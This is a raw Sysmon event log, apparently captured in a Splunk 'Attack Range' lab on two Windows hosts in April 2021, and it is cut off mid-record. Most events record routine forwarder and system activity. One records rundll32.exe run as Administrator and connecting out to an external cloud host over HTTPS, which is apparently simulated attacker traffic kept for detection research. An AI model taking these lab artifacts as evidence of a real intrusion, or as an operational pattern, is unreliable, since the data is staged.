12:21:19.032{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439555Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:20.557{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A496612372A5A61586BE40F9E7336FF1,SHA256=E875301809E0B00E320DD2CBF90BC7256D6F72C9B11EC3EBA9A485EB48E1A89D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290963Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:20.967{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9D17CA3495AEA4EF801EE6CF1042DC0,SHA256=58EFDCC59F57F32C63529918474FC78752020F953F1AF9E605C985613734380C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000290962Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:18.723{BEA10069-187E-6087-4F0E-00000000BB01}3388C:\Windows\SysWOW64\rundll32.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50587-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 354300x8000000000000000290961Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:18.391{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50586-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000290960Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:20.096{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CDDB808BCFBB8055EF191CAC2D30804,SHA256=94C56ECB73584699AA0713D1F5CD1DD87BDEF2F23CBFF575BE9436F94F65AE34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290959Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:20.096{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E9072E759B11458B49C08778B8D15E9,SHA256=34EEDB9660025D8B125CABA10AF4887EEFFD0DE4A426D996119BA06C63D4498F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439554Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:20.033{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439553Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:20.033{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000439562Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:18.506{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62364-false10.0.1.12-8000- 23542300x8000000000000000439561Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:21.929{42DC5269-CF3C-6086-AA00-00000000BA01}4168NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439560Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:21.791{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FE2A1EA11CB7CDBC633F62AB6EE3F96,SHA256=7A1C49452830EF478E03C3B62C1C967DA97410649954078FDC61F3E2E4C4C3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290964Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:21.969{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE010E5C3EF05ADB28E2F3DF3405BF1B,SHA256=12DDCD0E35F590C019121F9B10386B977C798F9FBDC666F718DB1E9BDA9641C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439559Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:21.056{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6151607716FD2C34EDBF385533733A61,SHA256=A930392A02B7E93F2F44B918443AE236782268980EF65D6BF5AC0D5B055421BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439558Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:21.055{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13013E805ACDF46164703933C0D6FB50,SHA256=5360357A50E5E455455901030204368DA8B69C4B155550B8E0B4E1316942173C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439557Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:21.034{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439556Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:21.034{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290979Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.971{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D35E675A24C579E843FEEBE2B3809F,SHA256=2CF3E87A36B630A577E034A647CCF195F274484652093DEE3ED9449E29002BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439565Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:22.934{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6151607716FD2C34EDBF385533733A61,SHA256=A930392A02B7E93F2F44B918443AE236782268980EF65D6BF5AC0D5B055421BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439564Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:22.035{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439563Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:22.035{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290978Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.802{BEA10069-01C2-6088-E729-00000000BB01}3886976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290977Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01C2-6088-E729-00000000BB01}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290976Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290975Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290974Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290973Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290972Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290971Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290970Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290969Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290968Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290967Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-01C2-6088-E729-00000000BB01}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000290966Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01C2-6088-E729-00000000BB01}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000290965Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:22.671{BEA10069-01C2-6088-E729-00000000BB01}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291009Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.989{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74BF895B4E2E6CE6281F4DED4CE522F6,SHA256=046B6515A5D709BD0813A0588C06ABDDC5A4898537926FA175810AFA36EE74FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439569Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 